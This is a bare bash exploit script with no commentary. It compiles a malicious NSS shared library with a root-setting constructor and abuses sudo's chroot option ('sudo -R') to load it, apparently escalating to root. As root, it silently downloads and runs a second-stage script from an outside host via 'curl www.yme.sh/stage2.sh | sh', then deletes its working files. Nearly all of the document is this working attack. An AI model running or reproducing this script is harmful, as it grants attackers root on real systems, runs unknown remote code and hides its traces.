#!/usr/bin/env bash
STAGE=$(mktemp -d /tmp/aXXXXXX)
cd ${STAGE?} 
CMD="curl www.yme.sh/stage2.sh 2>&1| sh >/dev/null 2>&1 "
CMD_C_ESCAPED=$(printf '%s' "$CMD" | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g')
cat >w.c <<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void xd1337(void) {
    setreuid(0, 0);
    setregid(0, 0);
    chdir("/");
    execl("/bin/sh", "sh", "-c", "${CMD_C_ESCAPED}", NULL);
}
EOF
mkdir -p xd/etc libnss_
echo "passwd: /w" >xd/etc/nsswitch.conf
cp /etc/group xd/etc/
gcc -shared -fPIC -Wl,-init,w -o libnss_/w.so.2 w.c
sudo -R xd /bin/true
rm -rf ${STAGE?}

